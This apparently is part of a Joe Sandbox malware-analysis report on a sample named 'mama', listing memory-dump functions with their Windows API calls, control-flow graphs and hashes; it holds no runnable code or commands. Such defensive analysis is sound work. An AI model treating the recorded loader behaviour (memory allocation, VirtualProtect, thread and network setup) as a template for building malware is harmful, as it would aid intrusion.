                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                          • String ID:
                                                          • API String ID: 3216391948-0
                                                          • Opcode ID: 1dc7ceeafbab51b8d08fc171851058297c98aefa1ed1d6b5a5992b8966d5259c
                                                          • Instruction ID: 439f9f3d5d9079e4fea1a17c5458b011233984a4fbb44f402f04d3984a26ff76
                                                          • Opcode Fuzzy Hash: 1dc7ceeafbab51b8d08fc171851058297c98aefa1ed1d6b5a5992b8966d5259c
                                                          • Instruction Fuzzy Hash: 7B115470A042499BEF04EFA4CD81AEEB7BAEF45744F5044B7E605E7350DB745E04CA61
                                                          Function 02F7E190 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1C3
                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1D3
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 6bcbe331e144d43aa334cbcbbabbdec9bf5a639d75f778eac6233a24ef3cb2d0
                                                          • Instruction ID: 15e48fc3453f9eb89fa21e3c2f01457903543819f5370cc940606571fcbc1a2d
                                                          • Opcode Fuzzy Hash: 6bcbe331e144d43aa334cbcbbabbdec9bf5a639d75f778eac6233a24ef3cb2d0
                                                          • Instruction Fuzzy Hash: 9EF0A771940608AFFB50FB74CD5289EB7EDEB493A179105B3FA14E3550EBB49F009914
                                                          Function 02F7DDB4 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7DFD9,?,?), ref: 02F7DDED
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9,?,?), ref: 02F7DE36
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9,?,?), ref: 02F7DE58
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 02F7DE76
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 02F7DE94
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 02F7DEB2
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 02F7DED0
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9), ref: 02F7DF10
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001), ref: 02F7DF3B
                                                          • RegCloseKey.ADVAPI32(?,02F7DFC3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales), ref: 02F7DFB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$QueryValue$CloseFileModuleName
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                          • API String ID: 2701450724-3496071916
                                                          • Opcode ID: 7107ac1f1fc63704a3e3704081992f3454baecce7d662ce1254cc2dd923bbaef
                                                          • Instruction ID: a9f7573a3a0e035539d026669bfd64ade6491c4137795278660d04ac1004203e
                                                          • Opcode Fuzzy Hash: 7107ac1f1fc63704a3e3704081992f3454baecce7d662ce1254cc2dd923bbaef
                                                          • Instruction Fuzzy Hash: FC51E075A40208BEEB10DAA4CC41FEEB7BDEF18784F9044A7BB04E6191D7B0AA44CA55
                                                          Function 02F75F50 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 35 2f75f50-2f75f5a 36 2f75f60-2f75f6b 35->36 37 2f75fe8-2f75feb 35->37 38 2f75fa4-2f75fbd call 2f759d4 36->38 39 2f75f6d-2f75f76 36->39 40 2f75ff1-2f76003 37->40 41 2f76258-2f7625d 37->41 57 2f75fe3-2f75fe6 38->57 58 2f75fbf-2f75fc5 38->58 42 2f75f7c-2f75f87 call 2f759d4 39->42 43 2f75f78-2f75f7a 39->43 46 2f76009-2f7600e 40->46 47 2f76118-2f7611d 40->47 44 2f76263-2f76265 41->44 45 2f75888-2f758a6 41->45 75 2f75f9f-2f75fa1 42->75 76 2f75f89-2f75f9d call 2f75590 call 2f75d58 42->76 50 2f758ac-2f758b5 45->50 51 2f7598b-2f7598f 45->51 55 2f76010-2f76014 46->55 56 2f76018-2f7601e 46->56 53 2f76123-2f7612b 47->53 54 2f76210-2f7622f call 2f759d4 47->54 59 2f758b7-2f758b9 50->59 60 2f758bb 50->60 61 2f75991-2f75999 51->61 62 2f7599b-2f759a6 call 2f759d4 51->62 53->54 64 2f76131-2f76138 53->64 91 2f76202-2f76206 54->91 92 2f76231-2f76237 54->92 66 2f76035-2f76050 56->66 67 2f76020-2f76026 56->67 70 2f75fc7 58->70 71 2f75fca-2f75fe1 call 2f75d58 58->71 72 2f758bd-2f758e3 VirtualQuery 59->72 60->72 73 2f759ca-2f759d3 61->73 62->73 112 2f759a8-2f759ae 62->112 77 2f76195-2f7619a 64->77 78 2f7613a-2f76147 64->78 68 2f76052-2f7605f 66->68 69 2f76098-2f760a5 66->69 80 2f760f0-2f760fb call 2f759d4 67->80 81 2f7602c-2f76033 67->81 82 2f76061-2f7606a 68->82 83 2f76090-2f76095 68->83 88 2f760a7-2f760ad 69->88 89 2f760b0-2f760bf 69->89 70->71 71->57 86 2f758e5-2f758f7 72->86 87 2f75953-2f7595e call 2f759d4 72->87 76->75 84 2f761a7-2f761cb 77->84 85 2f7619c-2f761a6 call 2f755ac 77->85 95 2f7617c-2f76189 78->95 96 2f76149-2f76152 78->96 125 2f76113-2f76117 80->125 126 2f760fd-2f76111 call 2f75590 call 2f75d58 80->126 81->55 81->66 82->68 99 2f7606c-2f76082 Sleep 82->99 83->69 101 2f761cd-2f761d4 84->101 102 2f761d8-2f761eb 84->102 85->84 86->87 103 2f758f9-2f7590e 86->103 87->73 136 2f75960-2f75966 87->136 104 2f760c6-2f760d6 88->104 89->104 105 2f760c1 call 2f755ac 89->105 108 2f7623c-2f76256 call 2f75560 call 2f75d58 92->108 109 2f76239 92->109 97 2f7618b-2f76193 95->97 98 2f76209 95->98 96->78 113 2f76154-2f7616c Sleep 96->113 97->77 97->98 98->54 99->83 114 2f76084-2f7608d Sleep 99->114 116 2f761f4-2f76200 101->116 102->116 119 2f761ed-2f761ef call 2f755ec 102->119 117 2f75912-2f75926 VirtualAlloc 103->117 118 2f75910 103->118 122 2f760e2-2f760ef 104->122 123 2f760d8-2f760dd call 2f755ec 104->123 105->104 109->108 129 2f759b0-2f759b5 112->129 130 2f759b8-2f759c5 call 2f75590 call 2f75d58 112->130 113->95 131 2f7616e-2f76179 Sleep 113->131 114->68 116->91 117->87 132 2f75928-2f7593c VirtualAlloc 117->132 118->117 119->116 123->122 126->125 129->130 130->73 131->78 132->87 141 2f7593e-2f75951 132->141 142 2f75970-2f75989 call 2f75560 call 2f75d58 136->142 143 2f75968-2f7596d 136->143 141->73 142->73 143->142
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6de23e0481613d32f453ce16a67517bdd3a2f3337e0f07a9c566b82818a8ad4
                                                          • Instruction ID: b7a7f9ebebe544f2b6a5661d2d372995538ca9e19342319ff56c07f1c9182dd4
                                                          • Opcode Fuzzy Hash: c6de23e0481613d32f453ce16a67517bdd3a2f3337e0f07a9c566b82818a8ad4
                                                          • Instruction Fuzzy Hash: C3C14862B00B040BE714AA7CDC8476EB79ADBC47A4F98863FEB55CB395DBA4CC058740
                                                          Function 02F759D4 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 155 2f759d4-2f759e6 156 2f75c34-2f75c39 155->156 157 2f759ec-2f759fc 155->157 158 2f75c3f-2f75c50 156->158 159 2f75d4c-2f75d4f 156->159 160 2f75a54-2f75a5d 157->160 161 2f759fe-2f75a0b 157->161 163 2f75c52-2f75c6e 158->163 164 2f75bf8-2f75c05 158->164 165 2f75d55-2f75d57 159->165 166 2f75780-2f757a9 VirtualAlloc 159->166 160->161 162 2f75a5f-2f75a6b 160->162 167 2f75a24-2f75a30 161->167 168 2f75a0d-2f75a1a 161->168 162->161 169 2f75a6d-2f75a79 162->169 170 2f75c70-2f75c78 163->170 171 2f75c7c-2f75c8b 163->171 164->163 176 2f75c07-2f75c10 164->176 172 2f757db-2f757e1 166->172 173 2f757ab-2f757d8 call 2f75734 166->173 177 2f75a32-2f75a40 167->177 178 2f75aa8-2f75ab1 167->178 174 2f75a44-2f75a51 168->174 175 2f75a1c-2f75a20 168->175 169->161 179 2f75a7b-2f75a87 169->179 180 2f75cd8-2f75cee 170->180 182 2f75ca4-2f75cac 171->182 183 2f75c8d-2f75ca1 171->183 173->172 176->164 186 2f75c12-2f75c26 Sleep 176->186 184 2f75ab3-2f75ac0 178->184 185 2f75aec-2f75af6 178->185 179->160 187 2f75a89-2f75a99 Sleep 179->187 194 2f75d07-2f75d13 180->194 195 2f75cf0-2f75cfe 180->195 189 2f75cae-2f75cc6 182->189 190 2f75cc8-2f75cca call 2f756b8 182->190 183->180 184->185 191 2f75ac2-2f75acb 184->191 192 2f75b68-2f75b74 185->192 193 2f75af8-2f75b23 185->193 186->163 196 2f75c28-2f75c2f Sleep 186->196 187->161 199 2f75a9f-2f75aa6 Sleep 187->199 200 2f75ccf-2f75cd7 189->200 190->200 191->184 201 2f75acd-2f75ae1 Sleep 191->201 197 2f75b76-2f75b88 192->197 198 2f75b9c-2f75bab call 2f756b8 192->198 203 2f75b25-2f75b33 193->203 204 2f75b3c-2f75b4a 193->204 206 2f75d15-2f75d28 194->206 207 2f75d34 194->207 195->194 205 2f75d00 195->205 196->164 210 2f75b8c-2f75b9a 197->210 211 2f75b8a 197->211 219 2f75bbd-2f75bf6 198->219 223 2f75bad-2f75bb7 198->223 199->160 201->185 213 2f75ae3-2f75aea Sleep 201->213 203->204 214 2f75b35 203->214 215 2f75b4c-2f75b66 call 2f755ec 204->215 216 2f75bb8 204->216 205->194 208 2f75d2a-2f75d2f call 2f755ec 206->208 209 2f75d39-2f75d4b 206->209 207->209 208->209 210->219 211->210 213->184 214->204 215->219 216->219
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,02F76274), ref: 02F75A8B
                                                          • Sleep.KERNEL32(0000000A,00000000,?,02F76274), ref: 02F75AA1
                                                          • Sleep.KERNEL32(00000000,?,?,?,02F76274), ref: 02F75ACF
                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,?,02F76274), ref: 02F75AE5
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: dffb3011768bfcca24cfcff7c2c7ed5e7ac71e5351df3f71f0cf46e1039b117a
                                                          • Instruction ID: d34027627c4591a6ccaf5666ea10a93eb5e5540117f38e13847f7312546c02ce
                                                          • Opcode Fuzzy Hash: dffb3011768bfcca24cfcff7c2c7ed5e7ac71e5351df3f71f0cf46e1039b117a
                                                          • Instruction Fuzzy Hash: 54C11272A01B518BD715DF28E8C4725BFE1EB85354F8882AFDA55EF389C7B09845CB80
                                                          Function 0311BF68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 231 311bf68-311bfa2 call 2f7a364 call 311c878 236 311bfa4-311bfba VirtualProtect 231->236 237 311bfbd-311bfd2 call 2f79ebc 231->237 236->237
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,0311BFD3), ref: 0311BFB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: VirtualProtect
                                                          • API String ID: 544645111-268857135
                                                          • Opcode ID: d746a363e241d0fed3f300ca6457588dcd856a8d18592ca11bdbdaf4460445f6
                                                          • Instruction ID: 8fdd92961b9670b740f7df745d8a373c5070a57af142adbff8b1969d861bf319
                                                          • Opcode Fuzzy Hash: d746a363e241d0fed3f300ca6457588dcd856a8d18592ca11bdbdaf4460445f6
                                                          • Instruction Fuzzy Hash: 51F03C76614308AFCB00DFA8D9508DEBBE9EB4C310B518475F914D7740D7309A208F91
                                                          Function 02F7E394 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetUserDefaultUILanguage.KERNEL32(00000000,02F7E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F7E532,00000000,?,00000105), ref: 02F7E43F
                                                          • GetSystemDefaultUILanguage.KERNEL32(00000000,02F7E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F7E532,00000000,?,00000105), ref: 02F7E467
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DefaultLanguage$SystemUser
                                                          • String ID:
                                                          • API String ID: 384301227-0
                                                          • Opcode ID: 016cfc97faa1776a6cac588e58a89e33319bf02bedac06a99079cfdef7b2e9d5
                                                          • Instruction ID: 7a6cd55b36c8c914be1b0a3c0cae8dfbf363305a6854ed9555e5ffa031e436e9
                                                          • Opcode Fuzzy Hash: 016cfc97faa1776a6cac588e58a89e33319bf02bedac06a99079cfdef7b2e9d5
                                                          • Instruction Fuzzy Hash: 76310D34E102199FDB10EF98C981AAEB7F6EF48394F5048B7D601A7250D7B4AD81CB91
                                                          Function 02F7E4B8 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A,00400000,0346EC1C,02F7D2B0), ref: 02F7E4F4
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A), ref: 02F7E545
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName
                                                          • String ID:
                                                          • API String ID: 1159719554-0
                                                          • Opcode ID: 0ebd0bcf7ff7eaddb62397f205dd5bb79c47d92ca3fc0edd534d16684c3f3c7e
                                                          • Instruction ID: 7909ee7bbfc656d1215ce400d9f4442835ce04f5dcffa3a2a2a604b44b00fdd3
                                                          • Opcode Fuzzy Hash: 0ebd0bcf7ff7eaddb62397f205dd5bb79c47d92ca3fc0edd534d16684c3f3c7e
                                                          • Instruction Fuzzy Hash: E3114271A4021C9BEB10EB64CD85BDE73B9DB04740F5140F7E608A6290EA705F848EA1
                                                          Function 03459234 Relevance: 3.0, APIs: 2, Instructions: 12networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 326 3459234-3459259 WSAStartup GetLastError
                                                          APIs
                                                          • WSAStartup.WS2_32(00000101,?), ref: 03459249
                                                          • GetLastError.KERNEL32(?,03460B4F,00000000,03460EDA), ref: 0345924E
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastStartup
                                                          • String ID:
                                                          • API String ID: 1235836516-0
                                                          • Opcode ID: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                          • Instruction ID: 84a07e7031a894004bbe0fcd44b23520eb8d6293700a20f68597d343db76af2b
                                                          • Opcode Fuzzy Hash: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                          • Instruction Fuzzy Hash: 62C0807094020C5BD710FADC5C02DD9F35C8704700F0002E15E0CC6241FAB11A100BE2
                                                          Function 02F79D58 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 327 2f79d58-2f79d73 328 2f79d75-2f79d81 327->328 329 2f79d83-2f79d91 call 2f76edc 327->329 333 2f79d94-2f79dbb CreateThread 328->333 329->333 334 2f79dc4-2f79dcc 333->334 335 2f79dbd-2f79dbf call 2f76ef8 333->335 335->334
                                                          APIs
                                                          • CreateThread.KERNEL32(?,?,02F79D20,00000000,?,?), ref: 02F79DB2
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 3cd9c24851a6da52c3082edca2e45b9e8528179c9ebcbfd74834747268672a86
                                                          • Instruction ID: 1d3e14dd6c38e120e9ae0e99f2ac25df819318f62a141ad5b858668115265188
                                                          • Opcode Fuzzy Hash: 3cd9c24851a6da52c3082edca2e45b9e8528179c9ebcbfd74834747268672a86
                                                          • Instruction Fuzzy Hash: DC018472B04614AFC700DE9CD884A8AB7ECDB493A0F004027F608DB341D6B1ED00C7A5
                                                          Function 02F7D244 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 337 2f7d244-2f7d252 338 2f7d254-2f7d26b GetModuleFileNameW call 2f7e4b8 337->338 339 2f7d27f-2f7d28a 337->339 341 2f7d270-2f7d277 338->341 341->339 342 2f7d279-2f7d27c 341->342 342->339
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00400000,?,0000020A,00400000,0346EC1C,02F7D2B0,?,?,02F800C0), ref: 02F7D262
                                                            • Part of subcall function 02F7E4B8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A,00400000,0346EC1C,02F7D2B0), ref: 02F7E4F4
                                                            • Part of subcall function 02F7E4B8: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A), ref: 02F7E545
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 4113206344-0
                                                          • Opcode ID: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                          • Instruction ID: bd935e75c22b1225f2b2299ae39798447f1337c9922cdf3553367ae89daead62
                                                          • Opcode Fuzzy Hash: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                          • Instruction Fuzzy Hash: 17E0C9B1A043109BDF14DE68C9C4B463794AF197A4F4445A6AE18DF246D3B1D9108BE1
                                                          Function 02F756B8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 343 2f756b8-2f756d6 call 2f7564c VirtualAlloc 346 2f75726-2f75731 343->346 347 2f756d8-2f75725 343->347
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,02F75CCF,?,02F76274), ref: 02F756CF
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6d2d3137d07c372220e16b4438d495b334e46ed645a9dad621cf12dbea257581
                                                          • Instruction ID: 41ba4d39cc135e158a469471a285e7e5aee690dfa9870062d05c6e9ebc28c3a2
                                                          • Opcode Fuzzy Hash: 6d2d3137d07c372220e16b4438d495b334e46ed645a9dad621cf12dbea257581
                                                          • Instruction Fuzzy Hash: 9FF03CF2B017118BE794EF7899807527BE5E744394B51417EEA49EF788D7B08C018B84

                                                          Non-executed Functions

                                                          Function 02F7DBC4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
